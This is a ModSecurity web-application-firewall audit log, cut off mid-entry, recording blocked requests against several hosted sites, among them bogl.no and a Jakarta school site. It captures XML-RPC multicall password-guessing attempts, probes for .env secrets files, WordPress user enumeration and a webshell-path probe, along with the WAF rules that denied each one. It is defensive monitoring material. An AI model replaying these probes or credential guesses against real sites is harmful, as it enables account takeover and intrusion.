[25/May/2025:13:45:06 +0700] aDK8cnP6UgzLD1l8HToSHgAAAAg 103.236.140.4 51638 103.236.140.4 8181 --0ddc6d4b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Charset: utf-8 --0ddc6d4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ddc6d4b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748155506503961 773 (- - -) Stopwatch2: 1748155506503961 773; combined=325, p1=287, p2=0, p3=0, p4=0, p5=38, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ddc6d4b-Z-- --7562af44-A-- [25/May/2025:13:48:44 +0700] aDK9THP6UgzLD1l8HToS6gAAAAg 103.236.140.4 53606 103.236.140.4 8181 --7562af44-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.178.146.199 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.178.146.199 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7562af44-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmifahmi132 --7562af44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7562af44-E-- --7562af44-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.178.146.199 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748155724873817 5486 (- - -) Stopwatch2: 1748155724873817 5486; combined=4007, p1=471, p2=3362, p3=0, p4=0, p5=102, sr=87, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7562af44-Z-- --9cb3be2d-A-- [25/May/2025:13:52:20 +0700] aDK-JHawJq5017Xs8D7wQwAAAMs 103.236.140.4 55528 103.236.140.4 8181 --9cb3be2d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.178.146.199 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.178.146.199 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9cb3be2d-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmifahmi-ladylike --9cb3be2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9cb3be2d-E-- --9cb3be2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.178.146.199 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748155940799262 5635 (- - -) Stopwatch2: 1748155940799262 5635; combined=4032, p1=471, p2=3375, p3=0, p4=0, p5=110, sr=86, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cb3be2d-Z-- --36bc060b-A-- [25/May/2025:13:54:44 +0700] aDK-tBEdxfhJOSxH8A8U8AAAAFg 103.236.140.4 56846 103.236.140.4 8181 --36bc060b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.178.146.199 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.178.146.199 X-Forwarded-Proto: https Connection: close Content-Length: 492 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --36bc060b-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmizhihuikandian_fahmi --36bc060b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36bc060b-E-- --36bc060b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.178.146.199 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156084363239 4546 (- - -) Stopwatch2: 1748156084363239 4546; combined=3702, p1=425, p2=3134, p3=0, p4=0, p5=84, sr=70, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36bc060b-Z-- --baefa20f-A-- [25/May/2025:13:59:35 +0700] aDK_19erygsLmB9N_YR34gAAAII 103.236.140.4 59440 103.236.140.4 8181 --baefa20f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.193 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --baefa20f-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmipassadminantix --baefa20f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --baefa20f-E-- --baefa20f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.193 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156375800834 5491 (- - -) Stopwatch2: 1748156375800834 5491; combined=4130, p1=474, p2=3478, p3=0, p4=0, p5=103, sr=84, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --baefa20f-Z-- --7717e971-A-- [25/May/2025:14:01:07 +0700] aDLAM3P6UgzLD1l8HToWqAAAAAk 103.236.140.4 60266 103.236.140.4 8181 --7717e971-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.193 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7717e971-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmi12antix_admin34 --7717e971-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7717e971-E-- --7717e971-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.193 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156467301112 5293 (- - -) Stopwatch2: 1748156467301112 5293; combined=3947, p1=472, p2=3298, p3=0, p4=0, p5=104, sr=88, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7717e971-Z-- --2f03ab30-A-- [25/May/2025:14:01:11 +0700] aDLAN3P6UgzLD1l8HToWtQAAAAI 103.236.140.4 60306 103.236.140.4 8181 --2f03ab30-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --2f03ab30-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmi12antix_admin34 --2f03ab30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f03ab30-E-- --2f03ab30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156471466821 4949 (- - -) Stopwatch2: 1748156471466821 4949; combined=3927, p1=459, p2=3305, p3=0, p4=0, p5=96, sr=85, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f03ab30-Z-- --59912a1f-A-- [25/May/2025:14:04:06 +0700] aDLA5hEdxfhJOSxH8A8XlQAAAFE 103.236.140.4 33610 103.236.140.4 8181 --59912a1f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.193 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --59912a1f-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmifahmilistelist123 --59912a1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59912a1f-E-- --59912a1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.193 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156646271257 6045 (- - -) Stopwatch2: 1748156646271257 6045; combined=4545, p1=535, p2=3832, p3=0, p4=0, p5=105, sr=89, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59912a1f-Z-- --916a2610-A-- [25/May/2025:14:05:55 +0700] aDLBU9erygsLmB9N_YR5MQAAAJE 103.236.140.4 34694 103.236.140.4 8181 --916a2610-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.93.250.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.93.250.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --916a2610-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --916a2610-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156755066630 2965 (- - -) Stopwatch2: 1748156755066630 2965; combined=1262, p1=411, p2=815, p3=0, p4=0, p5=35, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --916a2610-Z-- --0ff2073b-A-- [25/May/2025:14:08:03 +0700] aDLB03P6UgzLD1l8HToYhwAAAAk 103.236.140.4 35796 103.236.140.4 8181 --0ff2073b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 4.232.171.163 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 4.232.171.163 X-Forwarded-Proto: https Connection: close Content-Length: 489 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0ff2073b-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiantix-admin-2022 --0ff2073b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ff2073b-E-- --0ff2073b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 4.232.171.163 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156883851680 5564 (- - -) Stopwatch2: 1748156883851680 5564; combined=4058, p1=460, p2=3429, p3=0, p4=0, p5=100, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ff2073b-Z-- --86d3776e-A-- [25/May/2025:14:08:11 +0700] aDLB23awJq5017Xs8D70CwAAANM 103.236.140.4 35868 103.236.140.4 8181 --86d3776e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --86d3776e-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFAHMI@12345 --86d3776e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86d3776e-E-- --86d3776e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156891948136 5615 (- - -) Stopwatch2: 1748156891948136 5615; combined=3975, p1=464, p2=3336, p3=0, p4=0, p5=102, sr=88, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86d3776e-Z-- --488b4227-A-- [25/May/2025:14:09:55 +0700] aDLCQ9erygsLmB9N_YR6TgAAAJI 103.236.140.4 36798 103.236.140.4 8181 --488b4227-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 4.232.171.163 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 4.232.171.163 X-Forwarded-Proto: https Connection: close Content-Length: 501 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --488b4227-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmibusinessintegrator.com_fahmi --488b4227-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --488b4227-E-- --488b4227-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 4.232.171.163 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156995022693 5613 (- - -) Stopwatch2: 1748156995022693 5613; combined=4022, p1=455, p2=3349, p3=0, p4=0, p5=123, sr=91, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --488b4227-Z-- --8d64e038-A-- [25/May/2025:14:13:25 +0700] aDLDFXawJq5017Xs8D71eAAAAMU 103.236.140.4 38662 103.236.140.4 8181 --8d64e038-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.23.212 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.23.212 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8d64e038-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d64e038-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748157205627630 752 (- - -) Stopwatch2: 1748157205627630 752; combined=313, p1=274, p2=0, p3=0, p4=0, p5=39, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d64e038-Z-- --9acb610f-A-- [25/May/2025:14:14:09 +0700] aDLDQXP6UgzLD1l8HToa4QAAAAk 103.236.140.4 39060 103.236.140.4 8181 --9acb610f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 52.242.231.141 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 52.242.231.141 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9acb610f-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiadminantix2020 --9acb610f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9acb610f-E-- --9acb610f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 52.242.231.141 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748157249095333 5651 (- - -) Stopwatch2: 1748157249095333 5651; combined=4079, p1=501, p2=3432, p3=0, p4=0, p5=90, sr=71, sw=56, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9acb610f-Z-- --be92950c-A-- [25/May/2025:14:15:23 +0700] aDLDi3awJq5017Xs8D711wAAAMQ 103.236.140.4 39750 103.236.140.4 8181 --be92950c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.62.24.23 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.62.24.23 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --be92950c-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiadminantix.com --be92950c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be92950c-E-- --be92950c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.62.24.23 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748157323163256 5029 (- - -) Stopwatch2: 1748157323163256 5029; combined=3713, p1=417, p2=3150, p3=0, p4=0, p5=86, sr=79, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be92950c-Z-- --943bd917-A-- [25/May/2025:14:21:01 +0700] aDLE3XawJq5017Xs8D724QAAAMw 103.236.140.4 42900 103.236.140.4 8181 --943bd917-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 52.242.231.141 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 52.242.231.141 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --943bd917-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiantix123#$ --943bd917-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --943bd917-E-- --943bd917-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 52.242.231.141 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748157661878180 5463 (- - -) Stopwatch2: 1748157661878180 5463; combined=3882, p1=421, p2=3268, p3=0, p4=0, p5=112, sr=76, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --943bd917-Z-- --d30fe402-A-- [25/May/2025:14:28:01 +0700] aDLGgXP6UgzLD1l8HToibQAAABY 103.236.140.4 47700 103.236.140.4 8181 --d30fe402-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 52.164.218.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.164.218.198 X-Forwarded-Proto: http Connection: close --d30fe402-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d30fe402-H-- Message: Access denied with code 403 (phase 2). String match ".php" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 